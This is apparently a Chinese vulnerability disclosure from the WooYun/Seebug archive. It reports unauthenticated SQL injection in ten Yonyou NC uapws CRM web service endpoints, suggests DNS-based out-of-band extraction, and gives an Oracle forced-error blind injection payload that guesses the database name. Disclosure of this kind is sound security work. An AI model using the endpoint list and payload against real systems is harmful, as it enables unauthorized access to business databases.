### 简要描述:
wooyun搜了一下,没有人提,来一发。
### 详细说明:
首先,该接口是无需权限访问的。
已http://**.**.**.**/bugs/wooyun-2010-0178322为例:
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl
均存在注入
[<img src="https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png" alt="04184.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png)
[<img src="https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png" alt="04185.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png)
无法报错注入的,因为我们填充的数据是随意填充的,也没有办法盲注,可以使用dns查询的方式。
```
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService
<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService">
<soapenv:Header/>
<soapenv:Body>
<icur:exportCurrtypeToCrm>
```
[<img src="https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png" alt="04186.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png)
还有一种情况是无法报错注入,也不能盲注,延时也不可以,可以使用强制报错盲注的办法:
'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 来猜解数据。
### 漏洞证明:
http://**.**.**.**:9090/
暂无评论